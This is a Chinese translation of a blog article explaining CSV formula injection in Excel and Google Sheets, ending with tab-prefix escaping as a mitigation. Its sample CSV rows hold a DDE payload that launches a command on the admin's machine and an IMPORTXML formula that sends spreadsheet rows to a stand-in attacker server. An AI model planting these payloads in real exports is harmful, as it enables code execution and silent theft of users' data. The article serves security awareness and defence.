当前位置:   article > 正文

[译]CSV 注入:被人低估的巨大风险

csv注入风险等级

本文讲的是CSV 注入:被人低估的巨大风险,

最近我在记录本地用户近期的电费时发现这个问题,有人叫我把它写出来。

在某些方面上看来这是个旧新闻,但是从其他的角度看。嗯,我认为很少人意识到这个问题有有多强的破坏力,并且它能造成多大范围的损害。对于将用户的输入结果和允许管理员大批量的把信息导出到 CSV 文件的应用来说,都存在着一个有效的攻击方向。

对于每个应用都有效。

修订: 值得称赞的是,这些文章指出了这个问题 一位安全专家 2014 年的文章,里面探讨了一部分攻击方向另外一篇

现在我们开始正题吧 —— 设想我们有个记录时间或者票据的应用。用户们可以输入自己的时间(或者票据)到应用中,但是不能查看其他用户这部分的信息。然后网站管理员把这些输入信息导出到一个 CSV 文件,用一个电子表格应用打开它。看起来很正常。

攻击方向 1

我们都知道 CSV 文件是什么。其特征很简单,导出来的 CSV 文件看起来像是这样的

  1. UserId,BillToDate,ProjectName,Description,DurationMinutes
  2. 1,2017-07-25,Test Project,Flipped the jibbet,60
  3. 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240

够简单。里面没有什么危险的东西。连 RFC 也这样描述:

CSV 文件里包含的文本应该不会有任何风险。

即使从定义上看,它也应该是安全的。

等下,让我们来试一试将 CSV 文件修改为下面内容

  1. UserId,BillToDate,ProjectName,Description,DurationMinutes
  2. 1,2017-07-25,Test Project,Flipped the jibbet,60
  3. 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
  4. 2,2017-07-25,Important Client,"=2+5", 240

在 Excel 里计算表达式在 Excel 里计算表达式 在 Google Sheets 里计算公式在 Google Sheets 里计算公式

打开自 Excel(左边)和 Google Sheets(右边)。

嗯。这很奇怪。虽然单元格的内容在引号内,但由于第一个字符是 =,它以一个表达式的形式被处理。实际上 —— 至少是在 Excel 里 —— 包括 =-+ 和 @ 这样的符号都会触发这种行为,结果管理员发现数据的格式不正确,并因此而花大量的时间来查找原因(正是 Excel 的这个现象引起了我的注意力)。这很奇怪,但不是很危险,不是吗?

再等一下,表达式就是可以执行的代码。所以用户可以执行代码 —— 虽然只是表达式代码 —— 执行在管理员的机器上,而这台机器里有权限接触用户数据。

如果我们把 CSV 文件改成这样会有什么结果?(注意最后一行的 Description 列)

  1. UserId,BillToDate,ProjectName,Description,DurationMinutes
  2. 1,2017-07-25,Test Project,Flipped the jibbet,60
  3. 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
  4. 2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0", 240

如果我们用 Excel 打开会有什么结果?

计算器会打开!计算器会打开!

额滴神啊!

没错,系统的计算器打开了。

公平的说,在此之前的确有出现过一个警告。只是这警告是一大块文字,没人想要读它。即使有人想读,它也会明确建议:

只有当你信任这个 workbook 的数据时才点击确定

你想知道为什么会这样吗?这是一个应用的导出文件,是给管理员用的。他们当然信任这些数据!

如果他们的技术很好呢?那么更糟糕。他们知道 CSV 格式只是文本数据,因此不可能造成任何伤害。他们十分确信这一点。

就像这样,攻击者有无限制的权力在别人的电脑上下载键盘记录,安装东西,完全远程地执行代码,而且这台电脑如果属于一个经理或者一间公司的管理员的话,还可能有权限接触所有用户的数据。我想知道在这台电脑里面还有别的文件可以窃取吗?

攻击方向 2

好吧,以上的主要内容挺简短,但是毕竟这是个(相对)有名的漏洞。作为一个安全专家,可能你已经警告了所有的管理员谨慎使用 Excel,或者会考虑使用 Google Sheets 来代替它。毕竟,Sheets 不会被宏影响,不是吗?

这完全正确。所以我们收回“运行任何东西”的野心上,并把注意力放在仅仅是盗取数据上。毕竟,这里的前提是攻击者是一个普通的用户,他只能接触自己输入在系统上的数据。而一个管理员有权力看到每个用户的数据,我们有什么办法可以利用这一点吗?

好好回想一下,我们虽然不能在 Google Sheets 里运行宏,但是我们完全可以运行表达式。并且表达式不仅仅限制于简单的算术。实际上,我想问下在公式中是否有可用的 Google Sheets 命令能让我们把数据传输到其他地方?答案是有的,有很多的方法可以做到这一点。我们先关注其中的一个方法IMPORTXML

IMPORTXML(url, xpath_query)

当运行这个命令时,它会对上面的 url 发出一条 HTTP GET 请求,然后尝试解析并把返回数据插入到我们的电子表格。你是不是有一点想法了?

如果我们的 CSV 文件有以下内容:

  1. UserId,BillToDate,ProjectName,Description,DurationMinutes
  2. 1,2017-07-25,Test Project,Flipped the jibbet,60
  3. 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
  4. 2,2017-07-25,Important Client,"=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")",240

攻击者以符号 = 作为单元格的开头,然后把 IMPORTXML 的地址指向了一个攻击者的服务器,并把电子表格的数据作为查询字符串附在该地址上。现在攻击者可以打开他们的服务器日志然后 yoooooo。终于拿到了不属于他们的数据。在 Requestb.in 上自己试一试

有什么踪迹会留下来吗?没有警告,没有弹框,没有任何理由认为有出现过什么问题。攻击者只是输入了一个格式过的时间/问题/其他数据的条目,最终管理员当要看导出的 CSV 文件时,所有限制访问的数据都会瞬间,并悄悄地传输出去了。

等一下,我们能做得更过分

表达式式是运行在管理员的浏览器上的,这里面有管理员的用户账号和安全信息。并且 Google Sheets 并不是只能操作当前电子表格的数据,实际上它可以从 其他电子表格 拿数据,只要用户有接触过这些表格就行。而攻击者只需要知道其他表格的 id。这些信息通常不是什么秘密,它出现在电子表格的 url 上,通常会意外地发现电子邮件上有这些信息,或者发布在公司内部的文档上,通过 Google 的安全策略来确保只有授权用户才可以接触这些数据。

所以说,不只是你的导出结果/问题/其他数据可以溜出去。你的管理员有分别接触过客户列表或者工资信息的电子表格?那么这些信息可能也可以搞出去!一切尽在不言中,没有人会知道发生过这些事。一颗赛艇!

当然同样的诡计也可以完美地运行在 Excel 上。实际上,Excel 在这方面上简直是楷模 警方曾经利用过这个漏洞来追踪罪犯

但事情不一定会这样发展。

我展示这些信息给了大量的安全研究员看,他们指出了犯罪者的各种恶作剧。例如犯罪者在他们各自的通讯中植入了信息,这些信息是他们服务器的信标。这样一来,如果研究员秘密地查看他们在电子表格上的通讯信息,那么这个信标就会熄灭,这样犯罪者就可以有效地逃避想要窃听他们的人。

这很不理想。

预防

所以这一切到底是谁的错?

当然这不是 CSV 格式的错。格式本身不会自动地执行“像一条公式”的东西,这不是原本就有的用法。这个 bug 依赖于常用的电子表格程序,是程序在实际地做错事。当然 Google Sheets 必须和 Excel 的功能保持一致,而 Excel 必须支持已存在的数百万个复杂的电子表格。另外 —— 我不会研究这件事 —— 但 有充分理由相信 Excel 的行为来自于古代的 Lotus 1-2-3 的奇怪处理。目前来说让所有的电子表格程序改变这一行为是一大困难。我想应该把注意力转为改变每个人上。

我曾向 Google 报道他们的电子表格程序有漏洞。他们承认了,但是声称已经意识到了这个问题。虽然我确信他们明白这是一个漏洞,但他们给我一个明显的感觉:他们并没有真正考虑到在实践中可能会被滥用的情况。 至少在 CSV 导入并即将生成外部请求时,Google Sheets 应该发出一个警告。

但是把这件事的责任推在应用程序的开发者上也不是很实际。毕竟,大部分的开发人员没有理由在一个简单的业务应用里写了导出功能后,还会怀疑会出现这个问题。实际上,即使他们阅读该死的 RFC 也仍然不会有任何线索来发现这个问题。

那么你怎么预防这件事呢?

好吧,尽管 StackOverflow 和其他的网站提供了丰富的建议,但我发现只有一个(不在文档内的)方法可以使用在任意的电子表格程序上:

对于任何以表达式触发字符 =-+或者 @ 开头的单元格,您应该直接使用 tab 字符作为前缀。注意,如果单元格里的内容有引号,那么这个字符要在引号

  1. UserId,BillToDate,ProjectName,Description,DurationMinutes
  2. 1,2017-07-25,Test Project,Flipped the jibbet,60
  3. 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
  4. 2,2017-07-25,Important Client," =2+5", 240

这很奇怪,但是起作用了,同时 tab 字符不会显示在 Excel 和 Google Sheets 上。所以这就是我想要的吗?

不幸的是,这个故事还没完。这个字符虽然不会显示,但是仍然存在。用 =LEN(D4) 来快速测一下字符串的长度就可以确认这一事实。因此,在单元格的值只用来显示,而不会被程序所使用的前提下,这是一个可接受的方案。。更进一步,有趣的是这个字符会造成奇怪的不一致。CSV 格式用在应用程序之间的信息交流上。这意味着从一个应用程序导出的转义单元格的数据将会被另一个应用程序导入并作为数据的一部分。

最终我们得出一个糟糕的结论,当生成 CSV 导出文件时,你必须知道这导出文件是用来做什么的

  • 如果是为了在电子表格程序中计算时的能够看到这些数据,则应使用 tab 来转义。实际上这更重要,因为您不希望在导出到电子表格时字符串是“-2 + 3”时出现的结果为“1”,这让人感觉就像是用编程语言解析的结果。
  • 如果它被用作系统间的数据交流,那么不要转义任何东西。
  • 如果您不知道会发生什么事情,或者是要在电子表格应用程序中使用,或者随后这个电子表格将被用作软件的导入源,放弃吧,只能祈祷不会发生什么事情了(或者,总是在使用 Excel 时断开网络连接,并在工作时遵循所有的安全提示)(修订:这并非 100% 安全,因为攻击者仍然可以使用宏,让自己的二进制文件来覆盖已知的文件。去他的。)。

这是一场恶梦,人们可以利用这个漏洞做些邪恶的事情,并因此而造成损失,而且还没有明确的解决方案。这个漏洞应该要让更多更多的人知道。


原文发布时间为:2017年10月22日

本文来自云栖社区合作伙伴掘金,了解相关信息可以关注掘金网站。


声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/979733
推荐阅读
相关标签
  

闽ICP备14008679号